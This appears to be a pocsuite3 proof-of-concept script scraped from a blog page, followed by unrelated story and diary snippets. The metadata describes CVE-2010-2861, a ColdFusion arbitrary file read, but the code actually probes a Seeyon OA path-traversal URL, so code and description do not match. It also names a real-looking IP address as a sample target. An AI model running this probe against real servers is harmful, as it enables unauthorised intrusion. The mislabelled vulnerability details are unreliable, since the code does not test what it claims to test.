class TestPOC(POCBase):
vulLevel = 3
vulID = 'CVE-2010-2861'
version = '1.0'
author = ['360漏洞云']
vulDate = '2010-10-07'
createDate = '2021-10-26'
updateDate = ''
references = ['https://nvd.nist.gov/vuln/detail/CVE-2010-2861']
name = 'Adobe ColdFusion 文件读取漏洞'
appPowerLink = 'https://www.adobe.com/cn/'
appName = 'Adobe ColdFusion'
appVersion = ''
vulType = '任意文件读取漏洞'
desc = '''
Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。
'''
samples = ['https://59.46.196.54:444']
def _verify(self):
result = {}
upr = urlparse(self.url.strip('/'))
if upr.port:
ports = [upr.port]
else:
ports = [80,443]
for port in ports:
target = '{}://{}:{}'.format(upr.scheme, upr.hostname, port)
vulurl=target.strip("/")+"/seeyon/thirdpartyController.do.css/..;/ajax.do"
try:
resp = requests.get(vulurl,verify=False,allow_redirects=False,timeout=15 )
if 'NullPointerException:null' in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
except Exception as e:
# print(e)
logger.error(f"connect target '{self.url} failed!'")
return self.parse_output(result)
def _attack(self):
self._verify()
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register_poc(TestPOC)
pocsuite3
©著作权归作者所有,转载或内容合作请联系作者
- 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
- 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
- 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
推荐阅读更多精彩内容
- 2018.2.3 目标:身心健康,财富丰盛 好种子: 1早起健康早餐,种下健康的种子,回向群里姐妹及家人身心健康 ...
- 2018.3.1 目标:身心健康,财富丰盛 好种子: 1早起健康早餐,种下健康的种子 2收拾家,回向女儿和众学子干...